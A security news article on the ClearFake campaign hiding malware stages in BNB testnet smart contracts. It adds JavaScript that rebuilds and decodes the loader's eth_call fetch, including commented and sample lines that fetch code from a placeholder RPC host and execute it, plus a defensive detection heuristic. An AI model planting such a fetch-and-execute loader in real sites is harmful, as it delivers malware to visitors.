ClearFake Campaign Uses BNB Smart Chain Testnet Smart Contracts for C&C Infrastructure
Trend Micro researchers uncover ClearFake threat actors using immutable smart contracts on the BNB Smart Chain testnet to command and control malware, evading takedown.

Threat actors behind the ClearFake campaign have adopted a technique that hosts command-and-control infrastructure on the BNB Smart Chain (BSC) testnet, according to new research from Trend Micro's TrendAI team. By storing payload routing instructions in smart contracts, the attackers have created a resilient communication channel that cannot be seized, sinkholed, or altered by security vendors or law enforcement. The contract code is immutable once deployed, and the data it stores can typically be changed only by whoever holds the deployer's key, so the operators can rotate payloads at will while defenders cannot touch them.
The technique, known as EtherHiding, was first documented by Guardz in October 2023. It involves injecting a JavaScript loader into compromised websites that retrieves the next-stage payload data directly from a BSC contract via a standard eth_call JSON-RPC request. This defeats URL-based blocking, because the loader contains no attacker-controlled URL: the only endpoint it contacts is a public, legitimate BSC RPC node, and eth_call is a read-only query that creates no transaction and leaves no record on-chain. The ClearFake campaign has refined EtherHiding by storing the entire payload JavaScript on-chain rather than just a URL, so the malicious code is returned in full and executed in the victim's browser without any external hosting.
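The exchange described above, as an added example that is not part of the Trend Micro research: it builds the eth_call request an EtherHiding-style loader sends, ABI-decodes the dynamic string a Solidity view function returns in the node's reply, and unwraps the base64 layer to recover the stage-2 script. The RPC hostname, contract address, function selector and stage-2 script are all constructed placeholders; the recovered stage is only decoded here, never executed.

```javascript
// Added example for this article: a stand-in for an EtherHiding-style loader's
// on-chain fetch, plus the decoding an analyst applies to a captured response.
// The contract address, function selector, RPC hostname and stage-2 script are
// constructed placeholders, not indicators from the Trend Micro research.

const RPC_URL = "https://rpc.example-bsc-testnet.invalid"; // placeholder endpoint
const CONTRACT = "0x" + "ab".repeat(20);                    // placeholder address
const SELECTOR = "0xdeadbeef";                              // placeholder 4-byte function selector

// eth_call is a read-only JSON-RPC query: no transaction, no gas, nothing written on-chain.
function buildEthCallRequest(to, selector, id = 1) {
  return {
    jsonrpc: "2.0",
    id,
    method: "eth_call",
    params: [{ to, data: selector }, "latest"],
  };
}

// Encode a dynamic `string` the way a Solidity view function returns it:
// word 0 = offset to the data (0x20), word 1 = byte length, then the bytes
// right-padded to a 32-byte boundary. Used here only to construct sample data.
function abiEncodeString(str) {
  const bytes = Buffer.from(str, "utf8");
  const word = (n) => BigInt(n).toString(16).padStart(64, "0");
  const pad = (32 - (bytes.length % 32)) % 32;
  return "0x" + word(32) + word(bytes.length) + bytes.toString("hex") + "00".repeat(pad);
}

// Inverse of the above: what the loader (and the analyst) must do with `result`.
function abiDecodeString(hex) {
  const h = hex.startsWith("0x") ? hex.slice(2) : hex;
  if (h.length < 128) throw new Error("return data too short for a dynamic string");
  const offset = Number(BigInt("0x" + h.slice(0, 64)));
  const lenPos = offset * 2;
  if (lenPos + 64 > h.length) throw new Error("string offset points outside return data");
  const length = Number(BigInt("0x" + h.slice(lenPos, lenPos + 64)));
  const dataHex = h.slice(lenPos + 64, lenPos + 64 + length * 2);
  if (dataHex.length !== length * 2) throw new Error("string data truncated");
  return Buffer.from(dataHex, "hex").toString("utf8");
}

// The stage stored on-chain is base64-encoded JavaScript; unwrap both layers.
function decodeStage(ethCallResult) {
  const b64 = abiDecodeString(ethCallResult);
  return Buffer.from(b64, "base64").toString("utf8");
}

// Same over a whole JSON-RPC reply, surfacing node errors (e.g. a revert)
// instead of trying to decode an absent `result`.
function extractStage(rpcResponse) {
  if (rpcResponse.error) {
    throw new Error(`RPC error ${rpcResponse.error.code}: ${rpcResponse.error.message}`);
  }
  return decodeStage(rpcResponse.result);
}

// What a real loader does next (not invoked here; the stage is never executed):
//   fetch(RPC_URL, { method: "POST", body: JSON.stringify(buildEthCallRequest(CONTRACT, SELECTOR)) })
//     .then(r => r.json()).then(j => new Function(extractStage(j))());

// Constructed sample: a harmless stage-2 script, base64-wrapped and ABI-encoded
// exactly as a node would hand it back in `result`.
const SAMPLE_STAGE = 'console.log("stage-2 placeholder, constructed for this example");';
const SAMPLE_RESPONSE = {
  jsonrpc: "2.0",
  id: 1,
  result: abiEncodeString(Buffer.from(SAMPLE_STAGE, "utf8").toString("base64")),
};

function main() {
  console.log("request:", JSON.stringify(buildEthCallRequest(CONTRACT, SELECTOR)));
  console.log("recovered stage:", extractStage(SAMPLE_RESPONSE));
}

main();
```

For an analyst, the useful half is `abiDecodeString`: paste the `result` field captured from a proxy or browser network log and the on-chain stage comes back without touching the network. Rejecting malformed offsets and lengths matters because the contract owner controls the bytes and can feed a decoder anything.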
In the attack chain uncovered by TrendAI, the injected JavaScript on compromised websites queried a series of four smart contracts on the BNB testnet. Each contract served a distinct purpose: Smart Contract A held base64-encoded JavaScript for an anti-analysis dispatcher; Smart Contract B stored a Windows-specific ClickFix overlay; Smart Contract C contained a macOS-specific payload; and Smart Contract D functioned as an on-chain execution tracker that confirmed each victim compromise in real time by polling conversion states.
On Windows, the attack delivered two payloads at once: SectopRAT, a .NET-based remote access trojan capable of hijacking browser sessions, and ACRStealer, a C++ information stealer. Operating-system detection in the loader routed macOS visitors to a separate macOS payload instead. In both cases the victim was tricked into running the malicious command themselves through a ClickFix social-engineering overlay.
Operating on the BNB testnet offers several operational advantages for cybercriminals. Data written to the chain cannot be deleted or seized, and it is replicated to every node that syncs the chain, so there is no single server to take down. Because testnet BNB has no monetary value and is freely available from public faucets, deploying the contracts and updating their contents costs the attackers nothing. The consequence for defenders is that blocking has to move to the client side: the compromised page's injected loader, its outbound eth_call to a public RPC endpoint, and the ClickFix overlay it renders are the points that remain observable.
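Since the on-chain storage cannot be taken down, one place a defender can still act is the compromised page itself. The following is an added heuristic, not part of the Trend Micro write-up or its detection content, that scores inline script text on whether it both reads data from a chain (an eth_call request or a web3 library) and executes what it decoded. The indicator weights, the RPC hostname and the three sample scripts are constructed for illustration; the benign dapp sample is included to show why a chain read on its own must not fire.

```javascript
// Added example for this article: a heuristic a web scanner or browser
// extension could run over inline <script> text to flag EtherHiding-style
// loaders. Indicator weights and sample scripts are constructed here; this is
// not Trend Micro's detection logic.

const INDICATORS = [
  { name: "eth_call",      weight: 2, re: /["']eth_call["']/ },
  { name: "jsonrpc",       weight: 1, re: /\bjsonrpc\b\s*["']?\s*:\s*["']2\.0["']/ },
  { name: "web3_lib",      weight: 1, re: /\b(?:web3|ethers)\b|\.eth\.Contract\(/ },
  { name: "contract_addr", weight: 1, re: /\b0x[0-9a-fA-F]{40}\b/ },
  { name: "bsc_hint",      weight: 1, re: /\b(?:bsc|bnb|binance)\b/i },
  { name: "testnet",       weight: 1, re: /\btestnet\b/i },
  { name: "base64_decode", weight: 2, re: /\batob\(/ },
  { name: "dynamic_exec",  weight: 3, re: /\beval\(|new\s+Function\(|document\.write\(|createElement\(\s*["']script["']\)/ },
];

// A script is flagged only when it (a) reads chain data, (b) reaches a code
// execution sink, and (c) accumulates enough supporting indicators. Reading
// the chain alone is what every legitimate dapp does.
function assessScript(src) {
  const hits = INDICATORS.filter((i) => i.re.test(src));
  const names = hits.map((i) => i.name);
  const score = hits.reduce((sum, i) => sum + i.weight, 0);
  const readsChain = names.includes("eth_call") || names.includes("web3_lib");
  const executes = names.includes("dynamic_exec");
  return { hits: names, score, suspicious: readsChain && executes && score >= 6 };
}

// Constructed sample 1: an EtherHiding-style loader (placeholder host, address, selector).
const LOADER_SAMPLE = `
fetch("https://rpc.example-bsc-testnet.invalid", { method: "POST",
  body: JSON.stringify({ jsonrpc: "2.0", id: 1, method: "eth_call",
    params: [{ to: "0x${"ab".repeat(20)}", data: "0xdeadbeef" }, "latest"] }) })
  .then(r => r.json())
  .then(j => { var s = atob(decodeAbiString(j.result)); eval(s); });
`;

// Constructed sample 2: a legitimate dapp reading a token balance via ethers.js.
const DAPP_SAMPLE = `
const provider = new ethers.JsonRpcProvider(RPC_URL);
const raw = await provider.call({ to: "0x${"cd".repeat(20)}", data: "0x70a08231" });
document.getElementById("balance").textContent = raw;
`;

// Constructed sample 3: generic packed JavaScript with no chain interaction.
const PACKED_SAMPLE = `eval(atob("Y29uc29sZS5sb2coMSk="));`;

const SAMPLES = { loader: LOADER_SAMPLE, dapp: DAPP_SAMPLE, packed: PACKED_SAMPLE };

function main() {
  for (const [label, src] of Object.entries(SAMPLES)) {
    const verdict = assessScript(src);
    console.log(label, verdict.suspicious ? "SUSPICIOUS" : "ok", verdict.score, verdict.hits.join(","));
  }
}

main();
```

The decisive combination is a chain read feeding `atob` and then `eval`, `new Function` or an injected script element; the testnet and BSC hints only add weight. Tune the weights against your own traffic before relying on the verdict, and treat a hit as a trigger for pulling the `result` bytes and decoding the stage, not as proof on its own.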
TrendAI researchers identified four distinct smart contract addresses across the attack chain, all originating from a single deployer wallet. The oldest of these contracts was deployed nearly a year before the analysis, confirming that this blockchain-based C&C is a long-running, actively maintained campaign rather than a one-off experiment. The discovery came from a Trend Vision One Managed Detection and Response (MDR) case in which a single employee at a customer organization browsed a legitimate recreational website and suffered a multi-stage compromise.
Google's research published in October 2025 confirmed that North Korean state-sponsored actors tracked as UNC5342 have adopted the same blockchain C&C technique, indicating that this method is now being used by nation-state threat actors. The immutable and decentralized nature of blockchain technology presents significant challenges for defenders, as traditional sinkholing and content removal strategies are ineffective against payload data stored on-chain.